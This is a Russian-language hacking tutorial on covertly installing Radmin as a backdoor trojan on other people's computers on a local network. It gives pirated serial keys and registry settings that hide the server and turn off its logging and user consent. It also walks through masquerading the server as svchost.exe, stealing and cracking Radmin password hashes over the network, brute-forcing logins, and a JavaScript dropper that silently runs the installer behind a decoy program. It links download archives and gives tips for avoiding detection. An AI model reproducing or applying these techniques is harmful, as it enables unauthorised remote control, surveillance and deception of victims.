Intro

Помниться, летом уже прошедшего года, появилось вполне здоровое желание потренироваться в области троян-хака и возыметь определенную власть в местной локалке. Начились раскопки тырнета на предмет осваивания современных троев. (Кстати, кто там искал пинча? http://dkcs.void.ru/index.php?module=soft&page=troyans) . Именно тогда я заинтересовался радмином, а чуть позже узнал, что наш администратор именно с его помощью помогает бедным юзверям в их лам-делах. Какое совпадение =]

Как раз имено в то время в интернете начали появляться мануалы по установке\взлому радмина.
Просмотрев всё, что выплюнуло три поисковика, удалось собрать недетский хелп http://sec-123.narod.ru/radmin/1.rar

Запомните, порой всё что вам надо, делает сам разработчик. Я не раз убеждался в этом.
Поэтому READ THE FACKING MANUAL, мля !!! Где я и нашел практически всё, что нужно.
Дополнительная инфа из поисковиков добавило кучу вкусностей к пресному ману разработчика.

Почему именно Радмин?

1. Есть телнет, файловый менеджер, наблюдение и контроль за раб.столом, вкл\выкл компа.
2. Не палиться Касперским. НО УЧТИТЕ, что НОД его палит!!!
3. Возможность скрытой установки из консоли и малая палевность в системе.
4. Вобщем-то малый обём(не пинч конечно, но пайдёт)
5. Подержка прокси соединения на аналогичный радмин сервер(если ломать чужой радмин сервер).

Мы будем рассматривать версии от 2.0 до 2.2; они впринципе идентичные. Проги сами найдёте.
Привожу скучные коменты:

2.0
Serial_key: 08le-2jg4MggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk +ki2pQZHmM7lhysVBux8HE7udeSR0D1E0

2.1
Serial_key: 08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA 6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

2.2
Serial_key: 08mi6OFGZ7xOssk3ECduXquHrrfBQksiZK0BHfuF17GAXvJybP iTRTCm7tsnRkyGTs-VSDTEzQjAe7BtlsguDiq1

Радмин контролирует правильность и безопасность настройки серверной части программы. Radmin Server 2.2 не позволяет задать пустой пароль.
Интеллекуальная защита от подбора пароля и DoS-атак. В версии 2.2 добавлены такие меры защиты, как анти-хакерская задержка, блокирование подозрительных IP-адресов, и т. д

3.0
Текстовый чат
Голосовой чат

По поводу совметимости версий - главное, чтобы клиент(вы с него конектитесь) был не старее сервера(его вы имеете =] ).
В качестве клиента советую юзать 3-ю версию(есть сканер порта+иконки типа файла в фаловом менеджере, имхо вери удобно).
Я использую по сей день 2.0 сервак. Просто переделывать всё, что забацал на нём под другие версии просто влом =]

Все операции приведны для 2.0 сервера.
===============Скрытая Установка==================
+++++Введение++++++
Допустим, вы хакнули систему сплоитом(MS09-039_RPC-3, ms04-011, и др.) и смотрите на консоль с правами System.
Загрузим и запустим ниже рассмотренные файлы.

Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола)

Между прочим, если просто стартануть сервак без всякой установки, он заработает!!! Вход без пароля.
Однако, тут же палит себя в трее. Чтобы этого не случилось, необходимо прописаться в реестре

Вот список ключей в реестре:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled" - авторизация по юзеру (0-входит любой)
"Parameter" - пароль
"DisableTrayIcon" - 0 - без иконки в трее
"Port" - (стандартный порт сервера 4899)
"EnableLogFile" - 0 - отключено ведение логов
"LogFilePath" - пкть к логфайлу
"FilterIp" - фильтр айпишников.
"AskUser" - 0 - не спрашивать у юзверя разрешение на взлом =]

Сам же сервер автогрузиться как служба.

+++++Настройки скриптов.+++++
Самый кайф в том, что сервак может запускаться из ЛЮБОГО места (хоть из C:\RECYCLER), лишь бы там же были AdmDll.dll и raddrv.dll.
И назвать его можно как угодно. Переименуем r_server.exe в svchost.exe .

Путём проб и ошибок были составлены следующие скриптики: http://sec-123.narod.ru/radmin/4.rar

111.bat - автозапуск всего безобразия.
Сначала в правила встроенного в ХР фаервола добавляеться новое правило.
Затем извлекаються все записи из реестра в 123.reg про Радмин, если он был уже установлен.
Происходит автокопирование в системную папку(например, C:\Windows\).
Установки радмина обновляються на ваши(два варианта под 2000 и ХР)
Установка и запуск сервера.

111.reg
Здесь в параметрах зашиты следующие установки:
- вход с любого айпи
- пароль 123456789
- не показывать иконку в трее
- порт 4899
- не логировать
- не спрашивать разрешение на конект
- прописка лицензии для вечной работы =]


===================№3 Взлом Сервера Радмина==================
Раскажу про способы.

++++Доступ к реестру++++
У многих компов разрешен доступ на чтение реестра!
Юзать надо так через командную строку.
Для хелпа наберите
reg /? - для ХР
regedit /? - для 2000

REG COPY \\ZODIAC\HKLM\SYSTEM\RAdmin HKLM\Software\Hacker
Копирует все параметры раздела RAdmin с компьютера ZODIAC
в раздел HKLM\Software\Hacker на локальном компьютере.

Затем лезем к себе в реестр и копируем значение в *.txt файл.
HKLM\Software\Hacker\v2.0\Server\Parameters]
"Parameter"=??????????????????????????????????

Берем PasswordPRO, скармливаем ей наш txt-файл с паролем, выбирая алгоритм RADMIN, и ждём результата.

Кстати, если изменить пароль в реестре, изменение подействует без всяких перезагрузок сервера радмина.
И при следующем коннекте он будет уже действителен. Текущая сессия не прервётся при смене пароля.

+++++Подбор пароля++++
В инете мне попадалось на глаза всего два публичных радмин-брута.
Первый был на народе, но мне не посчастливилось его скачать - сайт прикрыли.
Есть второй вариант, по хуже, на зато рабочий. Выполнен на *.vbs скрипте.
Скорость фиговая, но для автоматизации перебора по словарю годиться.
Помните, что в 2.2 версии есть защитные механизмы от брута...
http://sec-123.narod.ru/radmin/2.rar

+++++Впаривание Радмина++++
Самый лучший способ - взять выше выложенные скрипты, оформить инструкции,
упаковать инсталлером с какой-нить прогой и впарить ламеру.

Вот, как это сделать без инсталлера.
Можно невидимо пустить bat-файл через ява-скрипт:
_README.js

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("111.bat",0);

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("screenseiver.scr",1);

Запуститься сначала установка радмина, а за ней какая-нить типа полезная прога.
http://sec-123.narod.ru/radmin/6.rar

+++++Как не спалиться++++
Если вы подобрали пароль на уже установленный радмин, советую заменить r_server.exe на пропатченную версию.
Дело в том, что иконка в трее при отсутствии соединений СИНЯЯ, а при наличии таковых - КРАСНАЯ.
Достаточно каким-либо редактором иконок поменять Красную на Синюю... http://sec-123.narod.ru/radmin/5.rar
Учтите, иногда перезапуск сервиса радмина возможен только после перезагрузки системы. Такой вот глюк.
Также, убедитесь в отсутствии логирования в реестре(см. выше).
Для конспирации при впаривании можно зашифровать батник, или сконвертировать его в *.com (http://sec-123.narod.ru/radmin/3.rar)

================================================

Ничего не забыл?...